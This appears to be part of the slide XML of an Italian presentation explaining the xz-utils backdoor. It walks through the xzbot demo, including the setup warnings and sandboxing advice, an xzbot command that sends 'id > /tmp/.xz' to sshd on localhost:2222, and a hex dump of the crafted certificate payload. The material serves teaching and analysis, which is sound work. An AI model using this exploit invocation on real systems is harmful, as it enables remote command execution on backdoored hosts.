              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="538609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800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xzbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Demo del progetto GitHub di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>amlweems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> per dimostrare il funzionamento della backdoor.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Prima di eseguire questa demo occorre:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Scaricare la libreria </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> vulnerabile (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>amlweems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> usa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/5.6.1-1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Essere quindi consci di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rischiare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> una call-home verso il C2 remoto reale di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Tan:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>"C2" abbrevia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-To-Control: è un server bot per orchestrare l'attacco;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>segnale call-home stabilisce una connessione "reverse", dalla network al C2 server;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Effettuare il setup opportuno di un ambiente di sandbox che isoli il sistema "cavia".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Come dimostrazione, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>amlweems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> sceglie di stampare UID e GID dell'utente della backdoor, inviando un comando a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, attivo di default sulla porta localhost:2222.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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737586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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Struttura della backdoor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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="495520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800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xzbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xzbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> 127.0.0.1:2222 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>id &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'                               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;-- in giallo, il comando inviato come payload
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>00000000  00 00 00 1c 73 73 68 2d  72 73 61 2d 63 65 72 74  |....</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ssh-rsa-cert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>|           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>1. Stampa le ID utente, ID gruppo principale, ID gruppi secondari
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>00000010  2d 76 30 31 40 6f 70 65  6e 73 73 68 2e 63 6f 6d  |-v01@openssh.com|           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>2. Scrivi la precedente stampa nel file .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> al percorso /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
00000020  00 00 00 00 00 00 00 03  01 00 01 00 00 01 01 01  |................|
00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
...
00000150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000160  00 00 01 14 00 00 00 07  73 73 68 2d 72 73 61 00  |........</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ssh-rsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>.|
00000170  00 00 01 01 00 00 01 00  02 00 00 00 01 00 00 00  |................|
00000180  00 00 00 00 00 00 00 00  54 97 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>bc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> c5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> 93 e4 24  |........T......$|
00000190  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>cf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> b1 57 57 59 85 52 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>  41 2a a5 54 9e aa c6 52  |..WWY.R.A*.T...R|
000001a0  58 64 a4 17 45 8a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>af</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> 76  ce d2 e3 0b 7c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>bb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> 1f 29  |</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Xd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>E..v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>....|..)|
000001b0  2b f0 38 45 3f 5e 00 f1  b0 00 15 84 e7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>bc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> 10 1f  |+.8E?^..........|
000001c0  0f 5f 50 36 07 9f bd 07  05 77 5c 74 84 69 c9 7a  |._P6.....w\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>t.i.z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>|
000001d0  28 6b e8 16 aa 99 34 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>bf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>  9d c4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>c4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> 5c b8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> 4a 3c  |(k....4....\..J&lt;|
000001e0  d8 2b 39 32 06 d9 4f a4  3a 00 d0 0b 0f a2 21 c0  |.+92..O.:.....!.|
000001f0  86 c3 c9 e2 e6 17 b4 a6  54 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> c3 a1 4c 40 91 be  |........T...L@..|
00000200  91 9a 2b f8 0b 18 61 1c  5e e1 e0 5b e8 00 00 00  |..+...a.^..[....|
00000210  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
...
00000260  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000270  00 00 00 00 00 00 00 00  00 00 00 10 00 00 00 07  |................|
00000280  73 73 68 2d 72 73 61 00  00 00 01 00              |</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ssh-rsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
